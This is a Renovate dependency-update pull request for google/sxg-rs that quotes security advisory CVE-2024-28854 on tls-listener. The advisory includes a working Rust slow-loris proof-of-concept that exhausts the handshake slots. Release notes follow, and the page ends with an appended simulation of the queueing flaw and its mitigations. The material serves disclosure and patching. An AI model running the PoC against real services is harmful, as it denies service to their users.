google / sxg-rs

A set of tools for generating signed exchanges at serve time.
Apache License 2.0

fix(deps): update rust crate tls-listener to 0.10.0 [security] #457

Open renovate-bot opened 4 months ago

renovate-bot commented 4 months ago

Mend Renovate

This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| tls-listener | dependencies | minor | 0.5.1 -> 0.10.0 |

GitHub Vulnerability Alerts

CVE-2024-28854

Summary

With the default configuration of tls-listener, a malicious user can open 6.4 TcpStreams a second, sending 0 bytes, and can trigger a DoS.

Details

The default configuration options make any public service using TlsListener::new() vulnerable to a slow-loris DoS attack.

```rust
use std::time::Duration;

/// Default number of concurrent handshakes
pub const DEFAULT_MAX_HANDSHAKES: usize = 64;
/// Default timeout for the TLS handshake.
pub const DEFAULT_HANDSHAKE_TIMEOUT: Duration = Duration::from_secs(10);
```

PoC

Running the HTTP TLS server example: https://github.com/tmccombs/tls-listener/blob/6c57dea2d9beb1577ae4d80f6eaf03aad4ef3857/examples/http.rs, then running the following script will prevent new connections to the server.

```rust
use std::{net::ToSocketAddrs, time::Duration};
use tokio::{io::AsyncReadExt, net::TcpStream, task::JoinSet};

#[tokio::main]
async fn main() {
    const N: usize = 1024;
    const T: Duration = Duration::from_secs(10);

    let url = "127.0.0.1:3000";
    let sockets: Vec<_> = url
        .to_socket_addrs()
        .unwrap()
        .inspect(|s| println!("{s:?}"))
        .collect();

    let mut js = JoinSet::new();

    let mut int = tokio::time::interval(T / (N as u32) / (sockets.len() as u32));
    int.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Burst);
    for _ in 0..10000 {
        for &socket in &sockets {
            int.tick().await;
            js.spawn(async move {
                let mut stream = TcpStream::connect(socket).await.unwrap();
                let _ = tokio::time::timeout(T, stream.read_to_end(&mut Vec::new())).await;
            });
        }
    }

    while js.join_next().await.is_some() {}
}
```

Impact

This is an instance of a slow-loris attack. This impacts any publicly accessible service using the default configuration of tls-listener.

Mitigation

Previous versions can mitigate this by passing a large value, such as usize::MAX as the parameter to Builder::max_handshakes.


Release Notes

tmccombs/tls-listener (tls-listener)

### [`v0.10.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#0100---2024-03-15) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.9.1...v0.10.0)

##### Security Advisory

Versions prior to this using the default configuration are vulnerable to a Slowloris attack. This version mitigates the vulnerability. Previous versions can mitigate the vulnerability by increasing the value passed to `Builder::max_handshakes` to a large number (such as `usize::MAX`). Decreasing the `handshake_timeout` can also help, although it is still strongly recommended to increase the `max_handshakes` more than the current default.

##### Changes

- [**breaking**] Change `poll_accept` not to have a limit on the number of pending handshakes in the queue, so that connections that are not making progress towards completing the handshake will not block other connections from being accepted. This replaces `Builder::max_handshakes` with `Builder::accept_batch_size`.

### [`v0.9.1`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#091---2023-12-23) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.9.0...v0.9.1)

##### Miscellaneous Tasks

- Update tokio-rustls

### [`v0.9.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#090---2023-12-05) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.8.0...v0.9.0)

##### Features

- [**breaking**] Remove until & remove option from accept
  - BREAKING CHANGE: remove `until` from AsyncAccept trait. Use `StreamExt.take_until` on the TlsListener instead.
  - BREAKING CHANGE: `accept` fn on AsyncAccept trait no longer returns an Option
  - BREAKING CHANGE: `accept` fn on TlsListener no longer returns an Option

##### Upgrade

- [**breaking**] Update to hyper 1.0
  - BREAKING CHANGE: Removed hyper-h1 and hyper-h2 features

### [`v0.8.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#080---2023-10-19) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.7.0...v0.8.0)

This is a backwards incompatible release. The main change is that accepting a new connection now returns a tuple of the new connection, and the peer address. The `AsyncAccept` trait was also changed similarly. The `Error` enum was also changed to provide more details about the error. And if the handshake times out, it now returns an error instead of silently waiting for the next connection.

##### Features

- [**breaking**] Add a new error type for handshake timeouts
  - BREAKING CHANGE: Adds a new variant to the Error Enum
  - BREAKING CHANGE: The Error enum is now non_exhaustive
  - BREAKING CHANGE: Now returns an error if a handshake times out
- [**breaking**] Yield remote address upon accepting a connection, and include it in errors.
  - BREAKING CHANGE: The enum variant `Error::ListenerError` is now struct-like instead of tuple-like, and is `non_exhaustive` like the enum itself.
  - BREAKING CHANGE: `Error` now has three type parameters, not two.
  - BREAKING CHANGE: `TlsListener::accept` and `::next` yields a tuple of (connection, remote address), not just the connection.
  - BREAKING CHANGE: `AsyncAccept` now has an associated type `Address`, which `poll_accept` must now return along with the accepted connection.
- [**breaking**] More changes for including peer address in response
  - BREAKING CHANGE: AsyncAccept::Error must implement std::error::Error
  - BREAKING CHANGE: TlsAcceptError is now a struct form variant.

### [`v0.7.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#070---2023-03-31) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.6.0...v0.7.0)

##### Changed

- Increase tokio-rustls version to 0.24.0

### [`v0.6.0`](https://togithub.com/tmccombs/tls-listener/blob/HEAD/CHANGELOG.md#060---2022-12-30) [Compare Source](https://togithub.com/tmccombs/tls-listener/compare/v0.5.1...v0.6.0)

##### Added

- Added additional tests and examples
- Re-export tls engine crates as public modules.

##### Changed

- Increased default handshake timeout to 10 seconds (technically a breaking change)

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.



This PR was generated by Mend Renovate. View the repository job log.
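The advisory's Mitigation section and the v0.10.0 changelog entry above both turn on one mechanism: a bounded number of in-flight handshakes lets stalled, zero-byte connections hold every slot until `handshake_timeout` expires, so the listener stops pulling honest clients out of the backlog. The following is an added, dependency-free simulation of that queueing behaviour, written for this note and not code from sxg-rs or tls-listener; the `ListenerModel` type, the one-second tick, and the "honest client completes one tick after its handshake starts" assumption are all constructed here. It compares the old default (64), the documented `usize::MAX` workaround, and the unbounded behaviour of 0.10.0.

```rust
use std::collections::VecDeque;

/// Listener model (constructed for this note). `max_handshakes = Some(64)` with a
/// 10 s timeout mirrors the advisory's defaults; `Some(usize::MAX)` is the workaround
/// for old versions; `None` models v0.10.0, which no longer bounds pending handshakes.
#[derive(Clone, Copy)]
pub struct ListenerModel {
    pub max_handshakes: Option<usize>,
    pub handshake_timeout: u64,
}

/// A TCP connection the kernel has accepted. An honest client finishes its handshake
/// one tick after the listener starts it; a slow client sends 0 bytes and never does.
struct Conn { arrived: u64, honest: bool }
struct Pending { conn: Conn, started: u64 }

/// Run `ticks` one-second steps; each tick `slow_per_sec` zero-byte connections and
/// one honest client arrive. Returns (honest handshakes completed, worst time an
/// honest client sat in the backlog before the listener even started its handshake).
pub fn simulate(m: ListenerModel, slow_per_sec: usize, ticks: u64) -> (usize, u64) {
    let mut backlog: VecDeque<Conn> = VecDeque::new(); // accepted by the kernel, not yet polled
    let mut in_flight: Vec<Pending> = Vec::new();      // handshakes the listener is driving
    let (mut done, mut worst_wait) = (0usize, 0u64);
    for now in 0..ticks {
        // Finish honest handshakes; drop stalled ones once handshake_timeout elapses.
        in_flight.retain(|p| {
            if p.conn.honest && now >= p.started + 1 { done += 1; return false; }
            now - p.started < m.handshake_timeout
        });
        for _ in 0..slow_per_sec { backlog.push_back(Conn { arrived: now, honest: false }); }
        backlog.push_back(Conn { arrived: now, honest: true });
        // Pre-0.10.0 poll_accept stops pulling from the backlog once max_handshakes are
        // in flight, so stalled handshakes starve every connection queued behind them.
        let room = m.max_handshakes.map_or(usize::MAX, |c| c.saturating_sub(in_flight.len()));
        for _ in 0..room.min(backlog.len()) {
            let conn = backlog.pop_front().unwrap();
            if conn.honest { worst_wait = worst_wait.max(now - conn.arrived); }
            in_flight.push(Pending { conn, started: now });
        }
    }
    (done, worst_wait)
}

fn main() {
    for (label, cap) in [("default 64", Some(64)), ("usize::MAX", Some(usize::MAX)), ("v0.10.0", None)] {
        let m = ListenerModel { max_handshakes: cap, handshake_timeout: 10 };
        let (done, wait) = simulate(m, 64, 60);
        println!("{:>11}: {} honest handshakes in 60 s, worst backlog wait {} s", label, done, wait);
    }
}
```

With 64 stalled connections arriving per second, the bounded default serves only 5 honest clients in a minute and the last of them waited 46 s in the backlog, while the `usize::MAX` workaround and the 0.10.0 behaviour serve every honest client with no wait.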